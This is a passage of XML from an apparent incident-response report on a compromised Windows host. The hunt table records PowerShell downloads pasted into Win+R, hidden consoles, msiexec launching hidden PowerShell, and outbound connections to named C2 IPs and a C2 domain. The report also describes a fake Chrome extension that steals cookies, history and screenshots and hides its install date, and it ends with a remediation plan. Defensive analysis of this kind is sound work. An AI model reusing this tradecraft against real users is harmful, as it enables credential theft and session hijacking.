        <w:t xml:space="preserve">Figure 1. Process tree of the first execution (times in UTC).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">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Result per query:</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900"/>
        <w:gridCol w:w="3829"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3300"/>
            <w:gridCol w:w="1900"/>
            <w:gridCol w:w="38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AF">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hypothesis / query</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40" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</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1">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence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1. Interpreter with a download launched by explorer.exe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Confirmed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> · 1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4 PowerShell executions with irm to a decimal IP: the paste and 3 retries.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1b. The same command in RunMRU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4 writes by explorer.exe with the same line: confirms it was pasted into Win+R.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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Hidden console (Script Block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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">GetConsoleWindow, ShowWindow(h, 0) and FreeConsole. Very likely explains the retries: the user saw nothing.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Hidden PowerShell child of msiexec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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">msiexec -Embedding </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> powershell -WindowStyle Hidden -File …\Temp\705546.ps1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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4. .NET binary with outbound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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ilasm.exe with no arguments </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 31.56.19.29:80. Blocked by reputation: it was the only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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Public IP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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ipinfo.io and, one second later, smashshape.com:443. No block, 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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Non-browser process modifies the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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirmed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 2 false positives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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">csc.exe modifies Secure Preferences. Excluded: mscopilot.exe and msedgewebview2.exe.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Extension C2 (WebSocket, 4343)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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The WebSocket channel does not show up in DeviceNetworkEvents.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7. Extensions outside the Web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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">New hypothesis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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Comes out of the persistence finding. Planned for the whole fleet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">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The persistence: a fake Chrome extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">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It presents itself as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“Save to Google Drive”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, with author “Google inc.”, loaded unpacked from a randomly named folder in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%LOCALAPPDATA%</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from_webstore: false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">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It injects content scripts into every frame: it can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read and modify any page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">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It steals cookies, history, bookmarks, downloads, the list of tabs and screenshots. It can also </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">write cookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which enables session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">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Its installation date was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backdated by one year</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; the files on disk contradict it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">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There were no Run keys, scheduled tasks or services: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the only persistence was in the browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The only thing that alerted was a known IOC.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Everything else was in the telemetry as ordinary events, waiting for someone to look for it. Had the IP of the first C2 not been on a list, the attack would not have generated a single alert.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">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ernanspefdji" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECOMMENDATIONS / ACTION PLAN</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1650"/>
        <w:gridCol w:w="2829"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="2100"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1150"/>
            <w:gridCol w:w="1650"/>
            <w:gridCol w:w="2829"/>
            <w:gridCol w:w="1300"/>
            <w:gridCol w:w="21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D4">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Priority</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D5">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding / risk</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D6">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommended action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D7">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</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D8">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Status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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXX-01 with a malicious extension and exposed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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Isolate the host, remove the extension and its folder, revoke the user’s sessions and cookies in web services, and force a credential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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXX (client) / XXXX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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In progress: host isolated (09/29, 12:40 UTC) and credentials reset. Pending: revoke sessions and reimage the host.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Two C2s not blocked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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Block 86.109.75.7, smashshape.com and 31.56.19.29 on the firewall and proxy, and load them as indicators in Defender for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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXX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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
